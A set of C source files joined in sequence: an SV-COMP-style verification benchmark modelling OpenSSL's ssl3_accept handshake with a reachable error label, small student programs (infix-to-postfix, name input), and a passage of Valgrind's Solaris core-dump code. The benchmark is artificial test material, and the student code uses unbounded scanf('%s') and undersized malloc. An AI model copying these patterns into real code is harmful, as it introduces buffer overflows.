EVP_CIPHER const *new_sym_enc ;
EVP_MD const *new_hash ;
SSL_COMP const *new_compression ;
int cert_request ;
};
struct ssl3_state_st {
long flags ;
int delay_buf_pop_ret ;
unsigned char read_sequence[8] ;
unsigned char read_mac_secret[36] ;
unsigned char write_sequence[8] ;
unsigned char write_mac_secret[36] ;
unsigned char server_random[32] ;
unsigned char client_random[32] ;
SSL3_BUFFER rbuf ;
SSL3_BUFFER wbuf ;
SSL3_RECORD rrec ;
SSL3_RECORD wrec ;
unsigned char alert_fragment[2] ;
unsigned int alert_fragment_len ;
unsigned char handshake_fragment[4] ;
unsigned int handshake_fragment_len ;
unsigned int wnum ;
int wpend_tot ;
int wpend_type ;
int wpend_ret ;
unsigned char const *wpend_buf ;
EVP_MD_CTX finish_dgst1 ;
EVP_MD_CTX finish_dgst2 ;
int change_cipher_spec ;
int warn_alert ;
int fatal_alert ;
int alert_dispatch ;
unsigned char send_alert[2] ;
int renegotiate ;
int total_renegotiations ;
int num_renegotiations ;
int in_read_app_data ;
struct __anonstruct_tmp_39 tmp ;
};
struct cert_pkey_st {
X509 *x509 ;
EVP_PKEY *privatekey ;
};
typedef struct cert_pkey_st CERT_PKEY;
struct cert_st {
CERT_PKEY *key ;
int valid ;
unsigned long mask ;
unsigned long export_mask ;
RSA *rsa_tmp ;
RSA *(*rsa_tmp_cb)(SSL *ssl , int is_export , int keysize ) ;
DH *dh_tmp ;
DH *(*dh_tmp_cb)(SSL *ssl , int is_export , int keysize ) ;
CERT_PKEY pkeys[5] ;
int references ;
};
struct sess_cert_st {
STACK *cert_chain ;
int peer_cert_type ;
CERT_PKEY *peer_key ;
CERT_PKEY peer_pkeys[5] ;
RSA *peer_rsa_tmp ;
DH *peer_dh_tmp ;
int references ;
};
struct ssl3_enc_method {
int (*enc)(SSL * , int ) ;
int (*mac)(SSL * , unsigned char * , int ) ;
int (*setup_key_block)(SSL * ) ;
int (*generate_master_secret)(SSL * , unsigned char * , unsigned char * , int ) ;
int (*change_cipher_state)(SSL * , int ) ;
int (*final_finish_mac)(SSL * , EVP_MD_CTX * , EVP_MD_CTX * , char const * ,
int , unsigned char * ) ;
int finish_mac_length ;
int (*cert_verify_mac)(SSL * , EVP_MD_CTX * , unsigned char * ) ;
char const *client_finished_label ;
int client_finished_label_len ;
char const *server_finished_label ;
int server_finished_label_len ;
int (*alert_value)(int ) ;
};
extern void *memcpy(void * __restrict __dest , void const * __restrict __src ,
size_t __n ) ;
extern void ERR_put_error(int lib , int func , int reason , char const *file , int line ) ;
SSL_METHOD *SSLv3_server_method(void) ;
extern SSL_METHOD *sslv3_base_method(void) ;
extern X509 *ssl_get_server_send_cert(SSL * ) ;
int ssl3_send_server_certificate(SSL *s ) ;
extern int ssl3_do_write(SSL *s , int type ) ;
extern unsigned long ssl3_output_cert_chain(SSL *s , X509 *x ) ;
int ssl3_accept(SSL *s ) ;
static SSL_METHOD *ssl3_get_server_method(int ver ) ;
static SSL_METHOD *ssl3_get_server_method(int ver )
{ SSL_METHOD *tmp ;
{
if (ver == 768) {
{
tmp = SSLv3_server_method();
}
return (tmp);
} else {
return ((SSL_METHOD *)((void *)0));
}
}
}
static int init = 1;
static SSL_METHOD SSLv3_server_data ;
SSL_METHOD *SSLv3_server_method(void)
{ char *tmp ;
SSL_METHOD *tmp___0 ;
{
if (init) {
{
tmp___0 = sslv3_base_method();
tmp = (char *)tmp___0;
memcpy((void *)((char *)(& SSLv3_server_data)), (void const *)tmp, sizeof(SSL_METHOD ));
SSLv3_server_data.ssl_accept = & ssl3_accept;
SSLv3_server_data.get_ssl_method = & ssl3_get_server_method;
init = 0;
}
} else {
}
return (& SSLv3_server_data);
}
}
int main(void)
{ SSL *s ;
int tmp ;
{
{
s = malloc(sizeof(SSL));
s->s3 = malloc(sizeof(struct ssl3_state_st));
s->ctx = malloc(sizeof(SSL_CTX));
s->session = malloc(sizeof(SSL_SESSION));
s->state = 8464;
tmp = ssl3_accept(s);
}
return (tmp);
}
}
int ssl3_accept(SSL *s )
{ BUF_MEM *buf ;
unsigned long l ;
unsigned long Time ;
unsigned long tmp ;
void (*cb)() ;
long num1 ;
int ret ;
int new_state ;
int state ;
int skip ;
int got_new_session ;
int tmp___1 = __VERIFIER_nondet_int() ;
int tmp___2 = __VERIFIER_nondet_int() ;
int tmp___3 = __VERIFIER_nondet_int() ;
int tmp___4 = __VERIFIER_nondet_int() ;
int tmp___5 = __VERIFIER_nondet_int() ;
int tmp___6 = __VERIFIER_nondet_int() ;
int tmp___7 ;
long tmp___8 = __VERIFIER_nondet_long() ;
int tmp___9 = __VERIFIER_nondet_int() ;
int tmp___10 = __VERIFIER_nondet_int() ;
int blastFlag ;
{
blastFlag = 0;
s->hit=__VERIFIER_nondet_int ();
s->state = 8464;
tmp = __VERIFIER_nondet_int();
Time = tmp;
cb = (void (*)())((void *)0);
ret = -1;
skip = 0;
got_new_session = 0;
if ((unsigned long )s->info_callback != (unsigned long )((void *)0)) {
cb = s->info_callback;
} else {
}
s->in_handshake += 1;
if (tmp___1 & 12288) {
if (tmp___2 & 16384) {
} else {
}
} else {
}
if ((unsigned long )s->cert == (unsigned long )((void *)0)) {
return (-1);
} else {
}
{
while (1) {
while_0_continue: /* CIL Label */ ;
state = s->state;
if (s->state == 12292) {
goto switch_1_12292;
} else {
if (s->state == 16384) {
goto switch_1_16384;
} else {
if (s->state == 8192) {
goto switch_1_8192;
} else {
if (s->state == 24576) {
goto switch_1_24576;
} else {
if (s->state == 8195) {
goto switch_1_8195;
} else {
if (s->state == 8480) {
goto switch_1_8480;
} else {
if (s->state == 8481) {
goto switch_1_8481;
} else {
if (s->state == 8482) {
goto switch_1_8482;
} else {
if (s->state == 8464) {
goto switch_1_8464;
} else {
if (s->state == 8465) {
goto switch_1_8465;
} else {
if (s->state == 8466) {
goto switch_1_8466;
} else {
if (s->state == 8496) {
goto switch_1_8496;
} else {
if (s->state == 8497) {
goto switch_1_8497;
} else {
if (s->state == 8512) {
goto switch_1_8512;
} else {
if (s->state == 8513) {
goto switch_1_8513;
} else {
if (s->state == 8528) {
goto switch_1_8528;
} else {
if (s->state == 8529) {
goto switch_1_8529;
} else {
if (s->state == 8544) {
goto switch_1_8544;
} else {
if (s->state == 8545) {
goto switch_1_8545;
} else {
if (s->state == 8560) {
goto switch_1_8560;
} else {
if (s->state == 8561) {
goto switch_1_8561;
} else {
if (s->state == 8448) {
goto switch_1_8448;
} else {
if (s->state == 8576) {
goto switch_1_8576;
} else {
if (s->state == 8577) {
goto switch_1_8577;
} else {
if (s->state == 8592) {
goto switch_1_8592;
} else {
if (s->state == 8593) {
goto switch_1_8593;
} else {
if (s->state == 8608) {
goto switch_1_8608;
} else {
if (s->state == 8609) {
goto switch_1_8609;
} else {
if (s->state == 8640) {
goto switch_1_8640;
} else {
if (s->state == 8641) {
goto switch_1_8641;
} else {
if (s->state == 8656) {
goto switch_1_8656;
} else {
if (s->state == 8657) {
goto switch_1_8657;
} else {
if (s->state == 8672) {
goto switch_1_8672;
} else {
if (s->state == 8673) {
goto switch_1_8673;
} else {
if (s->state == 3) {
goto switch_1_3;
} else {
{
goto switch_1_default;
if (0) {
switch_1_12292: /* CIL Label */
s->new_session = 1;
switch_1_16384: /* CIL Label */ ;
switch_1_8192: /* CIL Label */ ;
switch_1_24576: /* CIL Label */ ;
switch_1_8195: /* CIL Label */
s->server = 1;
if ((unsigned long )cb != (unsigned long )((void *)0)) {
} else {
}
if (s->version >> 8 != 3) {
return (-1);
} else {
}
s->type = 8192;
if ((unsigned long )s->init_buf == (unsigned long )((void *)0)) {
buf = __VERIFIER_nondet_pointer();
if ((unsigned long )buf == (unsigned long )((void *)0)) {
ret = -1;
goto end;
} else {
}
if (! tmp___3) {
ret = -1;
goto end;
} else {
}
s->init_buf = buf;
} else {
}
if (! tmp___4) {
ret = -1;
goto end;
} else {
}
s->init_num = 0;
if (s->state != 12292) {
if (! tmp___5) {
ret = -1;
goto end;
} else {
}
s->state = 8464;
(s->ctx)->stats.sess_accept += 1;
} else {
(s->ctx)->stats.sess_accept_renegotiate += 1;
s->state = 8480;
}
goto switch_1_break;
switch_1_8480: /* CIL Label */ ;
switch_1_8481: /* CIL Label */
s->shutdown = 0;
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
(s->s3)->tmp.next_state = 8482;
s->state = 8448;
s->init_num = 0;
goto switch_1_break;
switch_1_8482: /* CIL Label */
s->state = 3;
goto switch_1_break;
switch_1_8464: /* CIL Label */ ;
switch_1_8465: /* CIL Label */ ;
switch_1_8466: /* CIL Label */
s->shutdown = 0;
ret = __VERIFIER_nondet_int();
if (blastFlag == 0) {
blastFlag = 1;
} else {
}
if (ret <= 0) {
goto end;
} else {
}
got_new_session = 1;
s->state = 8496;
s->init_num = 0;
goto switch_1_break;
switch_1_8496: /* CIL Label */ ;
switch_1_8497: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (blastFlag == 1) {
blastFlag = 2;
} else {
if (blastFlag == 3) {
blastFlag = 4;
} else {
}
}
if (ret <= 0) {
goto end;
} else {
}
if (s->hit) {
s->state = 8656;
} else {
s->state = 8512;
}
s->init_num = 0;
goto switch_1_break;
switch_1_8512: /* CIL Label */ ;
switch_1_8513: /* CIL Label */ ;
if (((s->s3)->tmp.new_cipher)->algorithms & 256UL) {
skip = 1;
} else {
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
}
s->state = 8528;
s->init_num = 0;
goto switch_1_break;
switch_1_8528: /* CIL Label */ ;
switch_1_8529: /* CIL Label */
l = ((s->s3)->tmp.new_cipher)->algorithms;
if (s->options & 2097152UL) {
(s->s3)->tmp.use_rsa_tmp = 1;
} else {
(s->s3)->tmp.use_rsa_tmp = 0;
}
if ((s->s3)->tmp.use_rsa_tmp) {
goto _L___0;
} else {
if (l & 30UL) {
goto _L___0;
} else {
if (l & 1UL) {
if ((unsigned long )(s->cert)->pkeys[0].privatekey == (unsigned long )((void *)0)) {
goto _L___0;
} else {
if (((s->s3)->tmp.new_cipher)->algo_strength & 2UL) {
if (((s->s3)->tmp.new_cipher)->algo_strength & 4UL) {
tmp___7 = 512;
} else {
tmp___7 = 1024;
}
if (tmp___6 * 8 > tmp___7) {
_L___0:
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
} else {
skip = 1;
}
} else {
skip = 1;
}
}
} else {
skip = 1;
}
}
}
s->state = 8544;
s->init_num = 0;
goto switch_1_break;
switch_1_8544: /* CIL Label */ ;
switch_1_8545: /* CIL Label */ ;
if (s->verify_mode & 1) {
if ((unsigned long )(s->session)->peer != (unsigned long )((void *)0)) {
if (s->verify_mode & 4) {
skip = 1;
(s->s3)->tmp.cert_request = 0;
s->state = 8560;
} else {
goto _L___2;
}
} else {
_L___2:
if (((s->s3)->tmp.new_cipher)->algorithms & 256UL) {
if (s->verify_mode & 2) {
goto _L___1;
} else {
skip = 1;
(s->s3)->tmp.cert_request = 0;
s->state = 8560;
}
} else {
_L___1:
(s->s3)->tmp.cert_request = 1;
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
s->state = 8448;
(s->s3)->tmp.next_state = 8576;
s->init_num = 0;
}
}
} else {
skip = 1;
(s->s3)->tmp.cert_request = 0;
s->state = 8560;
}
goto switch_1_break;
switch_1_8560: /* CIL Label */ ;
switch_1_8561: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
(s->s3)->tmp.next_state = 8576;
s->state = 8448;
s->init_num = 0;
goto switch_1_break;
switch_1_8448: /* CIL Label */
if (num1 > 0L) {
s->rwstate = 2;
num1 = (long )((int )tmp___8);
if (num1 <= 0L) {
ret = -1;
goto end;
} else {
}
s->rwstate = 1;
} else {
}
s->state = (s->s3)->tmp.next_state;
goto switch_1_break;
switch_1_8576: /* CIL Label */ ;
switch_1_8577: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
if (ret == 2) {
s->state = 8466;
} else {
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
s->init_num = 0;
s->state = 8592;
}
goto switch_1_break;
switch_1_8592: /* CIL Label */ ;
switch_1_8593: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
s->state = 8608;
s->init_num = 0;
goto switch_1_break;
switch_1_8608: /* CIL Label */ ;
switch_1_8609: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
s->state = 8640;
s->init_num = 0;
goto switch_1_break;
switch_1_8640: /* CIL Label */ ;
switch_1_8641: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
if (s->hit) {
s->state = 3;
} else {
s->state = 8656;
}
s->init_num = 0;
goto switch_1_break;
switch_1_8656: /* CIL Label */ ;
switch_1_8657: /* CIL Label */
(s->session)->cipher = (s->s3)->tmp.new_cipher;
if (! tmp___9) {
ret = -1;
goto end;
} else {
}
ret = __VERIFIER_nondet_int();
if (blastFlag == 2) {
blastFlag = 3;
} else {
}
if (ret <= 0) {
goto end;
} else {
}
s->state = 8672;
s->init_num = 0;
if (! tmp___10) {
ret = -1;
goto end;
} else {
}
goto switch_1_break;
switch_1_8672: /* CIL Label */ ;
switch_1_8673: /* CIL Label */
ret = __VERIFIER_nondet_int();
if (blastFlag == 4) {
goto ERROR;
} else {
}
if (ret <= 0) {
goto end;
} else {
}
s->state = 8448;
if (s->hit) {
(s->s3)->tmp.next_state = 8640;
} else {
(s->s3)->tmp.next_state = 3;
}
s->init_num = 0;
goto switch_1_break;
switch_1_3: /* CIL Label */
s->init_buf = (BUF_MEM *)((void *)0);
s->init_num = 0;
if (got_new_session) {
s->new_session = 0;
(s->ctx)->stats.sess_accept_good += 1;
s->handshake_func = (int (*)())(& ssl3_accept);
if ((unsigned long )cb != (unsigned long )((void *)0)) {
} else {
}
} else {
}
ret = 1;
goto end;
switch_1_default: /* CIL Label */
ret = -1;
goto end;
} else {
switch_1_break: /* CIL Label */ ;
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
if (! (s->s3)->tmp.reuse_message) {
if (! skip) {
if (s->debug) {
ret = __VERIFIER_nondet_int();
if (ret <= 0) {
goto end;
} else {
}
} else {
}
if ((unsigned long )cb != (unsigned long )((void *)0)) {
if (s->state != state) {
new_state = s->state;
s->state = state;
s->state = new_state;
} else {
}
} else {
}
} else {
}
} else {
}
skip = 0;
}
while_0_break: /* CIL Label */ ;
}
end:
s->in_handshake -= 1;
if ((unsigned long )cb != (unsigned long )((void *)0)) {
} else {
}
return (ret);
ERROR: __VERIFIER_error();
}
}
int ssl3_send_server_certificate(SSL *s )
{ unsigned long l ;
X509 *x ;
int tmp ;
{
if (s->state == 8512) {
{
x = ssl_get_server_send_cert(s);
}
if ((unsigned long )x == (unsigned long )((void *)0)) {
{
ERR_put_error(20, 154, 157, "s3_srvr.c", 1844);
}
return (0);
} else {
}
{
l = ssl3_output_cert_chain(s, x);
s->state = 8513;
s->init_num = (int )l;
s->init_off = 0;
}
} else {
}
{
tmp = ssl3_do_write(s, 22);
}
return (tmp);
}
}
|
the_stack_data/70449022.c |
int main(){
return 0;
}
|
the_stack_data/165766366.c | #include <stdio.h>
#include <stdlib.h>
#define DEBUG
// A fun??o abaixo recebe uma express?o infixa inf e
// devolve a correspondente express?o posfixa.
char *infixaParaPosfixa (char inf[]) {
char *posf;
char *pi; int t; // pilha
int n, i, j;
n = strlen (inf);
posf = malloc (n * sizeof (char));
pi = malloc (n * sizeof (char));
t = 0;
pi[t++] = inf[0]; // empilha '('
for (j = 0, i = 1; /*X*/ inf[i] != '\0'; ++i) {
// a pilha est? em pi[0..t-1]
#ifdef DEBUG
int k;
for (k=0; k < i; k++) putchar (inf[k]);
putchar ('\t'); putchar ('\t'); putchar ('\t');
for (k=0; k < t; k++) putchar(pi[k]);
putchar ('\t'); putchar ('\t');putchar ('\t');
for (k=0; k < j; k++) putchar (posf[k]);
putchar('\n');
#endif
switch (inf[i]) {
char x;
case '(': pi[t++] = inf[i]; // empilha
break;
case ')': while (1) { // desempilha
x = pi[--t];
if (x == '(') break;
posf[j++] = x;
}
break;
case '+':
case '-': while (1) {
x = pi[t-1];
if (x == '(') break;
--t; // desempilha
posf[j++] = x;
}
pi[t++] = inf[i]; // empilha
break;
case '*':
case '/': while (1) {
x = pi[t-1];
if (x == '(' || x == '+' || x == '-')
break;
--t;
posf[j++] = x;
}
pi[t++] = inf[i];
break;
default: posf[j++] = inf[i];
}
}
free (pi);
posf[j] = '\0';
return posf;
}
int main (void){
// char s[256] = "(A*(B*C+D))";
// char s[256] = "(A+B*C)";
char s[256] = "(A*(B+C)/D-E)";
// char s[256] = "(A+B*(C-D*(E-F)-G*H)-I*3)";
// char s[256] = "((A+B)*D+E/(F+A*D)+C)";
printf ("%s\n", infixaParaPosfixa(s));
system("pause");
}
|
the_stack_data/57949525.c | #include <stdio.h>
int main () {
char str1[1000];
printf("Enter name: ");
scanf("%s", str1);
printf("Your name is %s\n", str1);
}
|
the_stack_data/42685.c |
/*--------------------------------------------------------------------*/
/*--- Dumping core on Solaris. coredump-solaris.c ---*/
/*--------------------------------------------------------------------*/
/*
This file is part of Valgrind, a dynamic binary instrumentation
framework.
Copyright (C) 2013-2015 Ivo Raisr
[email protected]
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307, USA.
The GNU General Public License is contained in the file COPYING.
*/
#if defined(VGO_solaris)
#include "pub_core_basics.h"
#include "pub_core_vki.h"
#include "pub_core_aspacehl.h"
#include "pub_core_aspacemgr.h"
#include "pub_core_coredump.h"
#include "pub_core_debuglog.h"
#include "pub_core_libcassert.h"
#include "pub_core_libcbase.h"
#include "pub_core_libcfile.h"
#include "pub_core_libcprint.h"
#include "pub_core_libcproc.h"
#include "pub_core_machine.h"
#include "pub_core_mallocfree.h"
#include "pub_core_options.h"
#include "pub_core_syscall.h"
#include "pub_core_threadstate.h"
#include "pub_core_xarray.h"
#include "pub_core_clientstate.h"
typedef struct __attribute__ ((__packed__)) note {
struct note *next;
VKI_ESZ(Nhdr) nhdr;
HChar name[8];
HChar data[0];
} note_t;
static void add_note(note_t **list, UInt type, const void *data,
UInt datasz);
/* If true, then this Segment may be mentioned in the core */
static Bool may_dump(const NSegment *seg)
{
if ((seg->kind == SkAnonC) ||
(seg->kind == SkShmC) ||
((seg->kind == SkFileC) &&
!VKI_S_ISCHR(seg->mode) && !VKI_S_ISBLK(seg->mode)))
return True;
return False;
}
/* If true, then this Segment's contents will be in the core */
static Bool should_dump(const NSegment *seg)
{
return may_dump(seg);
}
#if defined(SOLARIS_PRXREGSET_T)
static Bool should_dump_xregs(const ThreadState *tst)
{
#if defined(VGP_x86_solaris)
return False;
#elif defined(VGP_amd64_solaris)
const ThreadArchState *arch = (const ThreadArchState *) &tst->arch;
/* Dump 256-bit wide %ymm only when their upper half is non-zero. */
#define YMM_NON_ZERO(reg) \
((reg[4] != 0) || (reg[5] != 0) || (reg[6] != 0) || (reg[7] != 0))
if (YMM_NON_ZERO(arch->vex.guest_YMM0) ||
YMM_NON_ZERO(arch->vex.guest_YMM1) ||
YMM_NON_ZERO(arch->vex.guest_YMM2) ||
YMM_NON_ZERO(arch->vex.guest_YMM3) ||
YMM_NON_ZERO(arch->vex.guest_YMM4) ||
YMM_NON_ZERO(arch->vex.guest_YMM5) ||
YMM_NON_ZERO(arch->vex.guest_YMM6) ||
YMM_NON_ZERO(arch->vex.guest_YMM7) ||
YMM_NON_ZERO(arch->vex.guest_YMM9) ||
YMM_NON_ZERO(arch->vex.guest_YMM0) ||
YMM_NON_ZERO(arch->vex.guest_YMM10) ||
YMM_NON_ZERO(arch->vex.guest_YMM11) ||
YMM_NON_ZERO(arch->vex.guest_YMM12) ||
YMM_NON_ZERO(arch->vex.guest_YMM13) ||
YMM_NON_ZERO(arch->vex.guest_YMM14) ||
YMM_NON_ZERO(arch->vex.guest_YMM15))
return True;
return False;
#undef YMM_NON_ZERO
#else
# error Unknown ELF platform
#endif
}
#endif /* SOLARIS_PRXREGSET_T */
static void write_part(Int fd, const HChar *filename,
void *buf, SizeT buf_size, const HChar *part)
{
Int ret = VG_(write)(fd, buf, buf_size);
if (ret < 0) {
VG_(umsg)("Failed to write %s to coredump file %s, it may be "
"incomplete.\n", part, filename);
VG_(debugLog)(1, "coredump-solaris", "write_part: failed to write "
"%s to file %s. Buffer address=%p, length=%lu. "
"Error=%d.\n", part, filename, buf, buf_size, -ret);
}
}
/*====================================================================*/
/*=== Miscellaneous getters ===*/
/*====================================================================*/
static Int get_uid(void)
{
return sr_Res(VG_(do_syscall0)(SYS_getuid));
}
static Int get_gid(void)
{
return sr_Res(VG_(do_syscall0)(SYS_getgid));
}
static Int get_dmodel(void)
{
#if defined(VGP_x86_solaris)
return PR_MODEL_ILP32;
#elif defined(VGP_amd64_solaris)
return PR_MODEL_LP64;
#else
# error "Unknown platform"
#endif
}
static vki_zoneid_t get_zoneid(void)
{
SysRes sres = VG_(do_syscall2)(SYS_zone, VKI_ZONE_LOOKUP,
(UWord) NULL);
if (sr_isError(sres))
return 0;
return sr_Res(sres);
}
static UInt count_auxv(void)
{
UInt count = 1;
vki_auxv_t *auxv = (vki_auxv_t *) VG_(client_auxv);
while (auxv->a_type != VKI_AT_NULL) {
count += 1;
auxv++;
}
return count;
}
static Addr compute_stkbase(const ThreadState *tst)
{
return tst->client_stack_highest_byte + 1
- tst->client_stack_szB;
}
static Int get_wstat(const vki_siginfo_t *si)
{
return (si->si_signo & 0xff) | WCOREFLG;
}
/*====================================================================*/
/*=== Utility fillers ===*/
/*====================================================================*/
static void fill_platform(HChar *buf, UInt buf_size)
{
vg_assert(buf != NULL);
vg_assert(buf_size >= 1);
buf[0] = '\0';
VG_(do_syscall3)(SYS_systeminfo, VKI_SI_PLATFORM,
(UWord) buf, buf_size);
}
static void fill_zonename(HChar *buf, UInt buf_size)
{
vg_assert(buf != NULL);
vg_assert(buf_size >= 1);
buf[0] = '\0';
VG_(do_syscall5)(SYS_zone, VKI_ZONE_GETATTR, get_zoneid(),
VKI_ZONE_ATTR_NAME, (UWord) buf, buf_size);
}
static void fill_thread_state(const ThreadState *tst,
HChar *state, HChar *sname)
{
switch (tst->status) {
case VgTs_Runnable:
case VgTs_Yielding:
*state = VKI_SRUN;
*sname = 'R';
break;
case VgTs_WaitSys:
*state = VKI_SSLEEP;
*sname = 'S';
break;
case VgTs_Zombie:
*state = VKI_SZOMB;
*sname = 'Z';
break;
case VgTs_Empty:
case VgTs_Init:
*state = 0;
*sname = '?';
break;
}
}
static void fill_siginfo(const vki_siginfo_t *si, vki_siginfo_t *di,
Short *signo)
{
di->si_signo = si->si_signo;
di->si_code = si->si_code;
di->si_errno = 0;
di->si_addr = si->si_addr;
*signo = si->si_signo;
}
static void fill_argv(Int *argc, Addr *argv)
{
Addr *ptr = (Addr *) VG_(get_initial_client_SP)();
*argc = *ptr++;
*argv = (Addr) ptr;
}
static void fill_scheduling_class(HChar *buf, SizeT buf_size)
{
vg_assert(buf != NULL);
vg_assert(buf_size >= 1);
/* Valgrind currently schedules one thread at time which
resembles the default timeshare class. */
VG_(strncpy)(buf, "TS", buf_size);
}
static void fill_regset(vki_prgregset_t *regs, const ThreadState *tst)
{
const ThreadArchState *arch = (const ThreadArchState *) &tst->arch;
#if defined(VGP_x86_solaris)
(*regs)[VKI_EIP] = arch->vex.guest_EIP;
(*regs)[VKI_EAX] = arch->vex.guest_EAX;
(*regs)[VKI_EBX] = arch->vex.guest_EBX;
(*regs)[VKI_ECX] = arch->vex.guest_ECX;
(*regs)[VKI_EDX] = arch->vex.guest_EDX;
(*regs)[VKI_ESI] = arch->vex.guest_ESI;
(*regs)[VKI_EDI] = arch->vex.guest_EDI;
(*regs)[VKI_EBP] = arch->vex.guest_EBP;
(*regs)[VKI_UESP] = arch->vex.guest_ESP;
(*regs)[VKI_SS] = arch->vex.guest_SS;
(*regs)[VKI_CS] = arch->vex.guest_CS;
(*regs)[VKI_DS] = arch->vex.guest_DS;
(*regs)[VKI_ES] = arch->vex.guest_ES;
(*regs)[VKI_FS] = arch->vex.guest_FS;
(*regs)[VKI_GS] = arch->vex.guest_GS;
(*regs)[VKI_EFL] = LibVEX_GuestX86_get_eflags(&arch->vex);
#elif defined(VGP_amd64_solaris)
(*regs)[VKI_REG_RIP] = arch->vex.guest_RIP;
(*regs)[VKI_REG_RAX] = arch->vex.guest_RAX;
(*regs)[VKI_REG_RBX] = arch->vex.guest_RBX;
(*regs)[VKI_REG_RCX] = arch->vex.guest_RCX;
(*regs)[VKI_REG_RDX] = arch->vex.guest_RDX;
(*regs)[VKI_REG_RBP] = arch->vex.guest_RBP;
(*regs)[VKI_REG_RSI] = arch->vex.guest_RSI;
(*regs)[VKI_REG_RDI] = arch->vex.guest_RDI;
(*regs)[VKI_REG_R8] = arch->vex.guest_R8;
(*regs)[VKI_REG_R9] = arch->vex.guest_R9;
(*regs)[VKI_REG_R10] = arch->vex.guest_R10;
(*regs)[VKI_REG_R11] = arch->vex.guest_R11;
(*regs)[VKI_REG_R12] = arch->vex.guest_R12;
(*regs)[VKI_REG_R13] = arch->vex.guest_R13;
(*regs)[VKI_REG_R14] = arch->vex.guest_R14;
(*regs)[VKI_REG_R15] = arch->vex.guest_R15;
(*regs)[VKI_REG_RSP] = arch->vex.guest_RSP;
(*regs)[VKI_REG_CS] = VKI_UCS_SEL;
(*regs)[VKI_REG_DS] = 0;
(*regs)[VKI_REG_ES] = 0;
(*regs)[VKI_REG_FS] = 0;
(*regs)[VKI_REG_GS] = 0;
(*regs)[VKI_REG_SS] = VKI_UDS_SEL;
(*regs)[VKI_REG_FSBASE] = arch->vex.guest_FS_CONST;
(*regs)[VKI_REG_GSBASE] = 0;
(*regs)[VKI_REG_RFL] = LibVEX_GuestAMD64_get_rflags(&arch->vex);
#else
# error "Unknown platform"
#endif
}
static void fill_fpregset(vki_fpregset_t *fpu, const ThreadState *tst)
{
const ThreadArchState *arch = (const ThreadArchState *) &tst->arch;
#if defined(VGP_x86_solaris)
VG_(memset)(fpu, 0, sizeof(*fpu));
struct vki_fpchip_state *fs = &fpu->fp_reg_set.fpchip_state;
vg_assert(sizeof(fs->state) == 108);
LibVEX_GuestX86_get_x87(CONST_CAST(VexGuestX86State *, &arch->vex),
(UChar *) &fs->state);
/* SSE */
UInt mxcsr = LibVEX_GuestX86_get_mxcsr(CONST_CAST(VexGuestX86State *,
&arch->vex));
fs->mxcsr = mxcsr;
/* XMM registers */
#define COPY_OUT_XMM(dest, src) \
do { \
dest._l[0] = src[0]; \
dest._l[1] = src[1]; \
dest._l[2] = src[2]; \
dest._l[3] = src[3]; \
} while (0);
COPY_OUT_XMM(fs->xmm[0], arch->vex.guest_XMM0);
COPY_OUT_XMM(fs->xmm[1], arch->vex.guest_XMM1);
COPY_OUT_XMM(fs->xmm[2], arch->vex.guest_XMM2);
COPY_OUT_XMM(fs->xmm[3], arch->vex.guest_XMM3);
COPY_OUT_XMM(fs->xmm[4], arch->vex.guest_XMM4);
COPY_OUT_XMM(fs->xmm[5], arch->vex.guest_XMM5);
COPY_OUT_XMM(fs->xmm[6], arch->vex.guest_XMM6);
COPY_OUT_XMM(fs->xmm[7], arch->vex.guest_XMM7);
#undef COPY_OUT_XMM
#elif defined(VGP_amd64_solaris)
VG_(memset)(fpu, 0, sizeof(*fpu));
struct vki_fpchip_state *fs = &fpu->fp_reg_set.fpchip_state;
/* LibVEX_GuestAMD64_fxsave() requires at least 416 bytes. */
vg_assert(sizeof(*fs) >= 416);
LibVEX_GuestAMD64_fxsave(CONST_CAST(VexGuestAMD64State *, &arch->vex),
(Addr) fs);
#else
# error Unknown platform
#endif
}
/*====================================================================*/
/*=== Header fillers ===*/
/*====================================================================*/
static void fill_ehdr(VKI_ESZ(Ehdr) *ehdr, Int num_phdrs)
{
VG_(memset)(ehdr, 0, sizeof(*ehdr));
VG_(memcpy)(ehdr->e_ident, VKI_ELFMAG, VKI_SELFMAG);
ehdr->e_ident[VKI_EI_CLASS] = VG_ELF_CLASS;
ehdr->e_ident[VKI_EI_DATA] = VG_ELF_DATA2XXX;
ehdr->e_ident[VKI_EI_VERSION] = VKI_EV_CURRENT;
ehdr->e_type = VKI_ET_CORE;
ehdr->e_machine = VG_ELF_MACHINE;
ehdr->e_version = VKI_EV_CURRENT;
ehdr->e_entry = 0;
ehdr->e_flags = 0;
ehdr->e_ehsize = sizeof(VKI_ESZ(Ehdr));
ehdr->e_phoff = sizeof(VKI_ESZ(Ehdr));
ehdr->e_phentsize = sizeof(VKI_ESZ(Phdr));
/* If the count of program headers can't fit in the mere 16 bits
* shortsightedly allotted to them in the ELF header, we use the
* extended formats and put the real values in the section header
* at index 0.
*/
if (num_phdrs >= VKI_PN_XNUM) {
ehdr->e_phnum = VKI_PN_XNUM;
ehdr->e_shnum = 1;
ehdr->e_shoff = ehdr->e_phoff + ehdr->e_phentsize * num_phdrs;
ehdr->e_shentsize = sizeof(VKI_ESZ(Shdr));
} else {
ehdr->e_phnum = num_phdrs;
ehdr->e_shnum = 0;
